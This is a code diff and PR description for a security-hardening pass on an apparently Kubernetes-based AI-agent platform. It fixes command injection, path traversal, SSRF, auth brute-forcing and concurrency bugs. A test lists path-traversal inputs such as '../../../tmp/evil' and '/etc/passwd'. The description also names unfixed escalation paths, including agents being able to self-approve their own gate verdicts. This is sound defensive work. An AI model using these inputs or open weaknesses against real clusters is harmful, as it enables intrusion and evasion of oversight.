 							VolumeMounts: []corev1.VolumeMount{
 								{Name: "model-storage", MountPath: modelMountPath},

--- a/internal/controller/model_security_test.go
+++ b/internal/controller/model_security_test.go
@@ -187,15 +187,31 @@ func TestModelDownloadJob_SHA256Verification(t *testing.T) {
 		t.Fatalf("get job: %v", err)
 	}
 
-	script := job.Spec.Template.Spec.Containers[0].Command[2]
+	container := job.Spec.Template.Spec.Containers[0]
+	script := container.Command[2]
 	if !strings.Contains(script, "sha256sum") {
 		t.Error("download script should contain sha256sum verification when SHA256 is set")
 	}
-	if !strings.Contains(script, model.Spec.Source.SHA256) {
-		t.Error("download script should contain the expected checksum")
-	}
 	if !strings.Contains(script, "Checksum mismatch") {
 		t.Error("download script should fail on checksum mismatch")
+	}
+
+	// Security property: the checksum (and URL) must NOT be interpolated into
+	// the script text — they are passed via env vars so untrusted Model CR
+	// fields can never break out of the shell command. Assert the script has no
+	// literal value and references the env var instead.
+	if strings.Contains(script, model.Spec.Source.SHA256) {
+		t.Error("checksum must not be interpolated into the script text (command-injection risk); expected it via env var")
+	}
+	if !strings.Contains(script, "$MODEL_SHA256") {
+		t.Error("download script should reference the $MODEL_SHA256 env var")
+	}
+	envByName := map[string]string{}
+	for _, e := range container.Env {
+		envByName[e.Name] = e.Value
+	}
+	if envByName["MODEL_SHA256"] != model.Spec.Source.SHA256 {
+		t.Errorf("MODEL_SHA256 env = %q, want %q", envByName["MODEL_SHA256"], model.Spec.Source.SHA256)
 	}
 }
 

--- a/internal/controller/spawn_router.go
+++ b/internal/controller/spawn_router.go
@@ -500,6 +500,14 @@ func (sr *SpawnRouter) handleSubagentRequest(ctx context.Context, event *eventbu
 		return
 	}
 
+	// Sequential batch whose first task failed to spawn: no child exists to
+	// drive completion, so advance to the next task (or finalize). Without this,
+	// a first-task spawn failure with >1 task left the batch wedged forever.
+	if req.Strategy == "sequential" && len(delegates) == 0 {
+		sr.advanceSequential(ctx, batch)
+		return
+	}
+
 	// Patch parent status to AwaitingDelegate.
 	if len(delegates) > 0 {
 		if err := retry.RetryOnConflict(retry.DefaultRetry, func() error {
@@ -600,6 +608,41 @@ func (sr *SpawnRouter) handleBatchChildDone(ctx context.Context, childRunID, res
 	}
 }
 
+// advanceSequential drives a sequential batch forward after a child slot is
+// resolved by a *spawn failure* (rather than a normal completion event, which
+// is handled in handleBatchChildDone). Without this, a failed spawn incremented
+// the completed counter but never spawned the next task or finalized the batch,
+// so the parent's blocking spawn_subagents tool hung until the run timed out.
+func (sr *SpawnRouter) advanceSequential(ctx context.Context, batch *pendingBatch) {
+	batch.mu.Lock()
+	if batch.aborted {
+		batch.mu.Unlock()
+		return
+	}
+	// Fail-fast: abort the remaining tasks and finalize immediately.
+	if batch.failurePolicy == "fail-fast" && batch.failed > 0 {
+		batch.aborted = true
+		batch.mu.Unlock()
+		sr.finalizeBatch(ctx, batch)
+		return
+	}
+	// More tasks remain: spawn the next one (which, if it also fails, re-enters
+	// this method, bounded by the number of tasks).
+	if batch.nextIndex < len(batch.tasks) {
+		nextIdx := batch.nextIndex
+		batch.nextIndex++
+		batch.mu.Unlock()
+		sr.spawnSequentialChild(ctx, batch, nextIdx)
+		return
+	}
+	// No tasks left to spawn; finalize if everything has resolved.
+	done := batch.completed >= len(batch.tasks)
+	batch.mu.Unlock()
+	if done {
+		sr.finalizeBatch(ctx, batch)
+	}
+}
+
 // spawnSequentialChild spawns the next child in a sequential batch.
 func (sr *SpawnRouter) spawnSequentialChild(ctx context.Context, batch *pendingBatch, idx int) {
 	task := batch.tasks[idx]
@@ -617,6 +660,7 @@ func (sr *SpawnRouter) spawnSequentialChild(ctx context.Context, batch *pendingB
 		batch.completed++
 		batch.failed++
 		batch.mu.Unlock()
+		sr.advanceSequential(ctx, batch)
 		return
 	}
 
@@ -658,6 +702,7 @@ func (sr *SpawnRouter) spawnSequentialChild(ctx context.Context, batch *pendingB
 		batch.completed++
 		batch.failed++
 		batch.mu.Unlock()
+		sr.advanceSequential(ctx, batch)
 		return
 	}
 
@@ -709,7 +754,12 @@ func (sr *SpawnRouter) spawnSequentialChild(ctx context.Context, batch *pendingB
 
 // finalizeBatch publishes the aggregated batch result to the parent's IPC bridge.
 func (sr *SpawnRouter) finalizeBatch(ctx context.Context, batch *pendingBatch) {
-	sr.batches.Delete(batch.batchID)
+	// Idempotency guard: finalize exactly once per batch. LoadAndDelete returns
+	// loaded=false if another path already finalized (and removed) this batch,
+	// preventing a duplicate batch-result publish.
+	if _, loaded := sr.batches.LoadAndDelete(batch.batchID); !loaded {
+		return
+	}
 
 	// Determine overall status.
 	status := "success"

--- a/internal/controller/spawn_router_finalize_test.go
+++ b/internal/controller/spawn_router_finalize_test.go
@@ -1,0 +1,94 @@
+package controller
+
+import (
+	"context"
+	"sync"
+	"testing"
+
+	"github.com/go-logr/logr"
+
+	"github.com/sympozium-ai/sympozium/internal/eventbus"
+	"github.com/sympozium-ai/sympozium/internal/ipc"
+)
+
+// TestFinalizeBatch_Idempotent verifies that finalizeBatch publishes the batch
+// result exactly once even when called multiple times for the same batch — the
+// guard that lets the sequential-spawn-failure recovery path call finalize
+// without risking a duplicate result being delivered to the parent agent.
+func TestFinalizeBatch_Idempotent(t *testing.T) {
+	bus := &recordingEventBus{}
+	sr := &SpawnRouter{
+		EventBus: bus,
+		Log:      logr.Discard(),
+	}
+
+	batch := &pendingBatch{
+		batchID:     "batch-xyz",
+		parentRunID: "parent-1",
+		namespace:   "default",
+		tasks:       []ipc.SubagentTask{{ID: "a"}},
+		results:     []ipc.SubagentChildResult{{ID: "a", Status: "success"}},
+		completed:   1,
+	}
+	sr.batches.Store(batch.batchID, batch)
+
+	ctx := context.Background()
+	sr.finalizeBatch(ctx, batch)
+	sr.finalizeBatch(ctx, batch) // second call must be a no-op
+	sr.finalizeBatch(ctx, batch)
+
+	var count int
+	for _, e := range bus.published {
+		if e.Event != nil && e.Event.Metadata["batchId"] == "batch-xyz" {
+			count++
+		}
+	}
+	if count != 1 {
+		t.Errorf("finalizeBatch published %d batch results, want exactly 1", count)
+	}
+
+	// The batch must be removed from the in-memory map so it does not leak.
+	if _, ok := sr.batches.Load(batch.batchID); ok {
+		t.Error("batch was not deleted from sr.batches after finalize")
+	}
+}
+
+// TestFinalizeBatch_ConcurrentIsSingle exercises the LoadAndDelete guard under
+// concurrent finalize calls (e.g. a completion event and a spawn-failure
+// advance racing) and asserts only one result is published.
+func TestFinalizeBatch_ConcurrentIsSingle(t *testing.T) {
+	bus := &recordingEventBus{}
+	sr := &SpawnRouter{EventBus: bus, Log: logr.Discard()}
+
+	batch := &pendingBatch{
+		batchID:     "batch-conc",
+		parentRunID: "parent-2",
+		namespace:   "default",
+		tasks:       []ipc.SubagentTask{{ID: "a"}, {ID: "b"}},
+		results:     []ipc.SubagentChildResult{{ID: "a", Status: "success"}, {ID: "b", Status: "success"}},
+		completed:   2,
+	}
+	sr.batches.Store(batch.batchID, batch)
+
+	var wg sync.WaitGroup
+	for i := 0; i < 8; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			sr.finalizeBatch(context.Background(), batch)
+		}()
+	}
+	wg.Wait()
+
+	var count int
+	for _, e := range bus.published {
+		if e.Event != nil && e.Event.Metadata["batchId"] == "batch-conc" {
+			count++
+		}
+	}
+	if count != 1 {
+		t.Errorf("concurrent finalizeBatch published %d results, want exactly 1", count)
+	}
+}
+
+var _ = eventbus.EventBus(&recordingEventBus{})

--- a/internal/eventbus/nats.go
+++ b/internal/eventbus/nats.go
@@ -137,7 +137,11 @@ func (n *NATSEventBus) Subscribe(ctx context.Context, topic string) (<-chan *Eve
 				for msg := range msgs.Messages() {
 					var event Event
 					if uerr := json.Unmarshal(msg.Data(), &event); uerr != nil {
-						msg.Nak()
+						// Terminate (not Nak) an unparseable message. The consumer
+						// has no MaxDeliver/AckWait backoff, so Nak would redeliver
+						// the same poison message immediately and live-lock this
+						// subscription forever. Term drops it and advances.
+						msg.Term()
 						continue
 					}
 

--- a/internal/ipc/bridge.go
+++ b/internal/ipc/bridge.go
@@ -12,6 +12,7 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"strings"
 	"sync"
 	"time"
 
@@ -19,6 +20,22 @@ import (
 
 	"github.com/sympozium-ai/sympozium/internal/eventbus"
 )
+
+// isSafeIPCID reports whether an agent-supplied correlation ID (requestId /
+// batchId) is safe to interpolate into an IPC result filename. The ID
+// originates in the agent's own spawn-request JSON and is echoed back by the
+// control plane, so an adversarial agent could otherwise smuggle path
+// separators (e.g. "../../tmp/evil") to write result files outside /ipc.
+func isSafeIPCID(id string) bool {
+	if id == "" || len(id) > 253 {
+		return false
+	}
+	if strings.ContainsAny(id, "/\\") || strings.Contains(id, "..") {
+		return false
+	}
+	// A safe ID is a single path element equal to its own base name.
+	return filepath.Base(id) == id
+}
 
 // IPCDir layout constants matching the design doc protocol.
 const (
@@ -242,23 +259,30 @@ func (b *Bridge) handleSpawnRequest(ctx context.Context, fe FileEvent) {
 
 	metadata := b.metadata()
 
-	// Route subagent batch requests to a separate topic.
+	// Route by a positive filename allowlist. The bridge also writes its own
+	// result-*.json and subagent-result-*.json files into this same directory,
+	// so a catch-all "anything not a subagent request is a spawn" branch would
+	// re-publish every delegation result as a bogus spawn request. Only files
+	// the agent explicitly writes as spawn requests are forwarded.
 	base := filepath.Base(fe.Path)
-	if len(base) > 17 && base[:17] == "subagent-request-" {
+	switch {
+	case strings.HasPrefix(base, "subagent-request-"):
 		event, _ := eventbus.NewEvent(eventbus.TopicAgentSubagentRequest, metadata, json.RawMessage(data))
 		if err := b.EventBus.Publish(ctx, eventbus.TopicAgentSubagentRequest, event); err != nil {
 			b.Log.Error(err, "failed to publish subagent spawn request")
 		}
 		b.Log.Info("Forwarded subagent spawn request to control plane")
-		return
+	case strings.HasPrefix(base, "request-"):
+		event, _ := eventbus.NewEvent(eventbus.TopicAgentSpawnRequest, metadata, json.RawMessage(data))
+		if err := b.EventBus.Publish(ctx, eventbus.TopicAgentSpawnRequest, event); err != nil {
+			b.Log.Error(err, "failed to publish spawn request")
+		}
+		b.Log.Info("Forwarded spawn request to control plane")
+	default:
+		// result-*.json / subagent-result-*.json and any other file are not
+		// spawn requests — ignore them.
+		b.Log.V(1).Info("ignoring non-spawn file in spawn dir", "file", base)
 	}
-
-	event, _ := eventbus.NewEvent(eventbus.TopicAgentSpawnRequest, metadata, json.RawMessage(data))
-	if err := b.EventBus.Publish(ctx, eventbus.TopicAgentSpawnRequest, event); err != nil {
-		b.Log.Error(err, "failed to publish spawn request")
-	}
-
-	b.Log.Info("Forwarded spawn request to control plane")
 }
 
 // watchToolRequests watches /ipc/tools/ for exec requests.
@@ -446,6 +470,10 @@ func (b *Bridge) subscribeToInbound(ctx context.Context) {
 				RequestID string `json:"requestId"`
 			}
 			if json.Unmarshal(event.Data, &parsed) == nil && parsed.RequestID != "" {
+				if !isSafeIPCID(parsed.RequestID) {
+					b.Log.Error(fmt.Errorf("unsafe requestId"), "rejecting delegate result with path-unsafe requestId", "requestId", parsed.RequestID)
+					continue
+				}
 				filename := fmt.Sprintf("result-%s.json", parsed.RequestID)
 				path := filepath.Join(b.BasePath, DirSpawn, filename)
 				if err := os.WriteFile(path, event.Data, 0640); err != nil {
@@ -462,6 +490,10 @@ func (b *Bridge) subscribeToInbound(ctx context.Context) {
 				BatchID string `json:"batchId"`
 			}
 			if json.Unmarshal(event.Data, &parsed) == nil && parsed.BatchID != "" {
+				if !isSafeIPCID(parsed.BatchID) {
+					b.Log.Error(fmt.Errorf("unsafe batchId"), "rejecting subagent result with path-unsafe batchId", "batchId", parsed.BatchID)
+					continue
+				}
 				filename := fmt.Sprintf("subagent-result-%s.json", parsed.BatchID)
 				path := filepath.Join(b.BasePath, DirSpawn, filename)
 				if err := os.WriteFile(path, event.Data, 0640); err != nil {

--- a/internal/ipc/bridge_security_test.go
+++ b/internal/ipc/bridge_security_test.go
@@ -1,0 +1,29 @@
+package ipc
+
+import "testing"
+
+func TestIsSafeIPCID(t *testing.T) {
+	cases := []struct {
+		name string
+		id   string
+		want bool
+	}{
+		{"simple", "abc123", true},
+		{"uuid-like", "b3f1e2d4-5a6b-7c8d-9e0f-1a2b3c4d5e6f", true},
+		{"empty", "", false},
+		{"parent-traversal", "../../../tmp/evil", false},
+		{"embedded-slash", "a/b", false},
+		{"backslash", "a\\b", false},
+		{"leading-dotdot", "..", false},
+		{"dotdot-substring", "x..y", false},
+		{"absolute", "/etc/passwd", false},
+		{"too-long", string(make([]byte, 254)), false},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := isSafeIPCID(tc.id); got != tc.want {
+				t.Errorf("isSafeIPCID(%q) = %v, want %v", tc.id, got, tc.want)
+			}
+		})
+	}
+}

--- a/internal/webhook/policy_enforcer.go
+++ b/internal/webhook/policy_enforcer.go
@@ -185,14 +185,42 @@ func (pe *PolicyEnforcer) validateResources(run *sympoziumv1alpha1.AgentRun, pol
 		return nil
 	}
 
-	if policy.Spec.SandboxPolicy.MaxCPU != "" {
-		maxCPU := resource.MustParse(policy.Spec.SandboxPolicy.MaxCPU)
-		_ = maxCPU // Would compare against run's resource requests
+	if run.Spec.Sandbox.Resources == nil {
+		return nil
 	}
 
-	if policy.Spec.SandboxPolicy.MaxMemory != "" {
-		maxMem := resource.MustParse(policy.Spec.SandboxPolicy.MaxMemory)
-		_ = maxMem
+	// Compare both requests and limits against the policy caps, so a run cannot
+	// request more sandbox CPU/memory than its bound SympoziumPolicy permits.
+	check := func(dimension, capStr string, quantities []string) error {
+		if capStr == "" {
+			return nil
+		}
+		maxQ, err := resource.ParseQuantity(capStr)
+		if err != nil {
+			// A malformed policy cap should not silently disable enforcement.
+			return fmt.Errorf("policy sandboxPolicy.max%s %q is not a valid quantity: %w", dimension, capStr, err)
+		}
+		for _, q := range quantities {
+			if q == "" {
+				continue
+			}
+			reqQ, err := resource.ParseQuantity(q)
+			if err != nil {
+				return fmt.Errorf("sandbox %s request %q is not a valid quantity: %w", dimension, q, err)
+			}
+			if reqQ.Cmp(maxQ) > 0 {
+				return fmt.Errorf("sandbox %s %s exceeds policy limit %s", dimension, q, capStr)
+			}
+		}
+		return nil
+	}
+
+	res := run.Spec.Sandbox.Resources
+	if err := check("CPU", policy.Spec.SandboxPolicy.MaxCPU, []string{res.Requests["cpu"], res.Limits["cpu"]}); err != nil {
+		return err
+	}
+	if err := check("Memory", policy.Spec.SandboxPolicy.MaxMemory, []string{res.Requests["memory"], res.Limits["memory"]}); err != nil {
+		return err
 	}
 
 	return nil

--- a/internal/webhook/validate_resources_test.go
+++ b/internal/webhook/validate_resources_test.go
@@ -1,0 +1,122 @@
+package webhook
+
+import (
+	"testing"
+
+	"github.com/go-logr/logr"
+
+	sympoziumv1alpha1 "github.com/sympozium-ai/sympozium/api/v1alpha1"
+)
+
+func runWithSandboxResources(cpuReq, cpuLim, memReq, memLim string) *sympoziumv1alpha1.AgentRun {
+	res := &sympoziumv1alpha1.ResourceSpec{
+		Requests: map[string]string{},
+		Limits:   map[string]string{},
+	}
+	if cpuReq != "" {
+		res.Requests["cpu"] = cpuReq
+	}
+	if memReq != "" {
+		res.Requests["memory"] = memReq
+	}
+	if cpuLim != "" {
+		res.Limits["cpu"] = cpuLim
+	}
+	if memLim != "" {
+		res.Limits["memory"] = memLim
+	}
+	return &sympoziumv1alpha1.AgentRun{
+		Spec: sympoziumv1alpha1.AgentRunSpec{
+			Sandbox: &sympoziumv1alpha1.AgentRunSandboxSpec{
+				Enabled:   true,
+				Resources: res,
+			},
+		},
+	}
+}
+
+func policyWithCaps(maxCPU, maxMem string) *sympoziumv1alpha1.SympoziumPolicy {
+	return &sympoziumv1alpha1.SympoziumPolicy{
+		Spec: sympoziumv1alpha1.SympoziumPolicySpec{
+			SandboxPolicy: &sympoziumv1alpha1.SandboxPolicySpec{
+				MaxCPU:    maxCPU,
+				MaxMemory: maxMem,
+			},
+		},
+	}
+}
+
+func TestValidateResources(t *testing.T) {
+	pe := &PolicyEnforcer{Log: logr.Discard()}
+
+	cases := []struct {
+		name    string
+		run     *sympoziumv1alpha1.AgentRun
+		policy  *sympoziumv1alpha1.SympoziumPolicy
+		wantErr bool
+	}{
+		{
+			name:    "within limits",
+			run:     runWithSandboxResources("500m", "1", "1Gi", "2Gi"),
+			policy:  policyWithCaps("2", "4Gi"),
+			wantErr: false,
+		},
+		{
+			name:    "cpu request exceeds cap",
+			run:     runWithSandboxResources("3", "", "", ""),
+			policy:  policyWithCaps("2", "4Gi"),
+			wantErr: true,
+		},
+		{
+			name:    "cpu limit exceeds cap",
+			run:     runWithSandboxResources("", "3", "", ""),
+			policy:  policyWithCaps("2", "4Gi"),
+			wantErr: true,
+		},
+		{
+			name:    "memory limit exceeds cap",
+			run:     runWithSandboxResources("", "", "", "8Gi"),
+			policy:  policyWithCaps("2", "4Gi"),
+			wantErr: true,
+		},
+		{
+			name:    "exactly at cap is allowed",
+			run:     runWithSandboxResources("2", "2", "4Gi", "4Gi"),
+			policy:  policyWithCaps("2", "4Gi"),
+			wantErr: false,
+		},
+		{
+			name:    "no caps configured allows anything",
+			run:     runWithSandboxResources("64", "64", "256Gi", "256Gi"),
+			policy:  policyWithCaps("", ""),
+			wantErr: false,
+		},
+		{
+			name:    "malformed policy cap is rejected, not ignored",
+			run:     runWithSandboxResources("1", "", "", ""),
+			policy:  policyWithCaps("not-a-quantity", ""),
+			wantErr: true,
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			err := pe.validateResources(tc.run, tc.policy)
+			if tc.wantErr && err == nil {
+				t.Errorf("expected error, got nil")
+			}
+			if !tc.wantErr && err != nil {
+				t.Errorf("expected no error, got: %v", err)
+			}
+		})
+	}
+}
+
+func TestValidateResources_NoSandbox(t *testing.T) {
+	pe := &PolicyEnforcer{Log: logr.Discard()}
+	// A run with no sandbox spec must pass regardless of caps.
+	run := &sympoziumv1alpha1.AgentRun{}
+	if err := pe.validateResources(run, policyWithCaps("1", "1Gi")); err != nil {
+		t.Errorf("expected nil for run without sandbox, got: %v", err)
+	}
+}

--- a/internal/webproxy/proxy.go
+++ b/internal/webproxy/proxy.go
@@ -1,6 +1,7 @@
 package webproxy
 
 import (
+	"crypto/subtle"
 	"encoding/json"
 	"net/http"
 	"strings"
@@ -70,19 +71,21 @@ func (p *Proxy) authMiddleware(next http.Handler) http.Handler {
 			return
 		}
 
+		// Rate-limit before authenticating so failed-auth attempts are also
+		// throttled; otherwise brute-forcing the static key runs at wire speed.
+		if !p.limiter.Allow() {
+			writeError(w, http.StatusTooManyRequests, "rate limit exceeded")
+			return
+		}
+
 		auth := r.Header.Get("Authorization")
 		if !strings.HasPrefix(auth, "Bearer ") {
 			writeError(w, http.StatusUnauthorized, "missing or invalid Authorization header")
 			return
 		}
 		token := strings.TrimPrefix(auth, "Bearer ")
-		if token != p.config.APIKey {
+		if subtle.ConstantTimeCompare([]byte(token), []byte(p.config.APIKey)) != 1 {
 			writeError(w, http.StatusUnauthorized, "invalid API key")
-			return
-		}
-
-		if !p.limiter.Allow() {
-			writeError(w, http.StatusTooManyRequests, "rate limit exceeded")
 			return
 		}
 

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -70,7 +70,7 @@ extra:
     - icon: fontawesome/brands/github
       link: https://github.com/sympozium-ai/sympozium
 
-copyright: Copyright &copy; 2024-2026 Alex Jones — Apache License 2.0
+copyright: Copyright &copy; 2024-2026 Alex Jones — MIT License
 
 nav:
   - Home: index.md


### PR DESCRIPTION
## Summary

Hardening pass from a full-codebase review. Fixes a set of confirmed security, reliability, and correctness defects plus a few build/CRD/docs breakages. Every change is verified against the code; the risky ones have new unit tests. No behavioral changes beyond the fixes themselves.

All packages build, `go vet` is clean, and the full suite passes under `-race` (14 test packages, incl. 7 new/expanded test files).

## Security

- **agent-runner `fetch_url` SSRF** — added a dial-time IP guard rejecting loopback/link-local/private/unspecified targets (also defeats DNS-rebinding, since it checks the dialed IP). Opt out with `SYMPOZIUM_FETCH_URL_ALLOW_PRIVATE=true`. Previously any URL reached the node metadata service, NATS, or the kube-apiserver.
- **apiserver `proxyProviderModels` SSRF** — the filter blocked only link-local; extended to loopback/private/unspecified. Also switched the UI bearer-token check to `subtle.ConstantTimeCompare`.
- **web-proxy auth** — constant-time API-key compare, and rate-limit **before** auth so failed-auth attempts are throttled (was brute-forceable at wire speed).
- **model-download command injection** — `source.url`/`sha256`/`filename` were interpolated into `sh -c`; now passed as env vars against a static script.
- **memory-server DoS** — request bodies capped at 4 MiB (was unbounded `/store` → PV/memory exhaustion).
- **IPC bridge** — reject path-unsafe agent-supplied `requestId`/`batchId` before writing result files (traversal out of `/ipc`); route spawn-dir files by a positive prefix allowlist so result files aren't re-published as spawn requests.
- **webhook `validateResources`** — now actually enforces SandboxPolicy `MaxCPU`/`MaxMemory` (was a no-op that parsed and discarded the caps).

## Reliability / correctness

- **Controller nil-map panic** in memory persistence (CrashLoop vector on an emptied ConfigMap) → initialize map.
- **Ensemble token-budget double-count** — `reconcileCompleted` runs 2–3× per run and re-added usage each time, tripping `halt` budgets early → idempotency guard annotation + regression test.
- **Spawn-router sequential-batch deadlock** — a single failed child spawn wedged the batch forever (parent hung to timeout) → advance/finalize on failure; `finalizeBatch` made idempotent + tests.
- **NATS poison message** live-locked a subscription (`Nak` with no backoff) → `Term`.
- **node-probe** panicked on a non-positive `probeInterval` → 30s fallback via a tested helper.
- **TUI table couldn't scroll** past one screenful → derive scroll offset from selection each render.
- **Model download** marked `Failed` on the first transient pod failure despite `BackoffLimit: 2` → gate on the Job's terminal condition.
- **Discord** bot-to-bot reply loops → filter other bots/webhooks. **Telegram** token redaction in logs/health events + backoff on HTTP/`ok!=true` (was a hot loop on 401/409).

## Charts / CRD / build

- CRD printer columns `instanceRef` → `agentRef` on AgentRun/SympoziumSchedule (blank column in `kubectl get`). Regenerated + both chart copies synced. **Verified live on-cluster.**
- Chart `models.yaml` honors explicit `gpu: 0` (was coerced to 1 → Unschedulable). Verified via `helm template`.
- `make install` no longer collides with the chart Namespace on fresh clusters (`--set createNamespace=false`); `make run-controller`/`dev-all` scale the correct `sympozium-controller-manager` name.

## Docs

License (MIT not Apache), install URL host, `serve --port` default (9090), and the primary getting-started Ensemble example (`personas:` → `agentConfigs:`, so it applies cleanly).

## Testing

- `go build ./...`, `go vet ./...` clean; `go test -race ./...` all pass.
- New tests: SSRF dial guard, `validateResources`, `isSafeIPCID` traversal guard, `resolveProbeInterval`, telegram `redactToken`, `finalizeBatch` idempotency (incl. concurrent), token-budget idempotency, and the model command-injection property (checksum via env, not script text).
- Runtime: the CRD printer-column fix was applied to a live cluster and confirmed; control plane stayed healthy.
- **Not** redeployed to the running kind cluster: it lives on a separate host reachable only via kubectl (no SSH/registry access from here), so rebuilt images couldn't be `kind load`ed. Images do build cleanly (`make docker-build-{controller,webhook,node-probe}` verified).

## Follow-ups (not in this PR — need design decisions)

These are the higher-severity systemic issues the review surfaced that change security semantics or product behavior and warrant separate discussion:

1. **SkillPack RBAC & HostAccess are ungated** — a SkillPack can grant arbitrary ClusterRBAC to the shared agent SA and request privileged/hostPath/hostNetwork sidecars with no SympoziumPolicy check; the `AllowHostMounts` policy field is defined but referenced nowhere. Top escalation path.
2. **No MutatingWebhookConfiguration** — the `/mutate-agent-pods` handler is registered but never wired, so tool-policy defaulting / SA-token disable / seccomp injection are dead; an AgentRun omitting `toolPolicy` gets no gating even under a deny-default policy.
3. **apiserver auth is opt-in** (off when `SYMPOZIUM_UI_TOKEN` is empty) with **no namespace tenancy**.
4. **Shared `sympozium-agent` SA** makes per-run RBAC scoping and the annotation-based gate mechanism cosmetic (an agent can self-approve its own gate verdict).
5. **NATS is anonymous + plaintext** with agent egress to `:4222`.
6. **CRD `bool + omitempty + default=true`** reverts explicit `false` on client round-trips (`includeMemory`, NetworkPolicy `denyAll`/`allowDNS`) → switch to `*bool`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
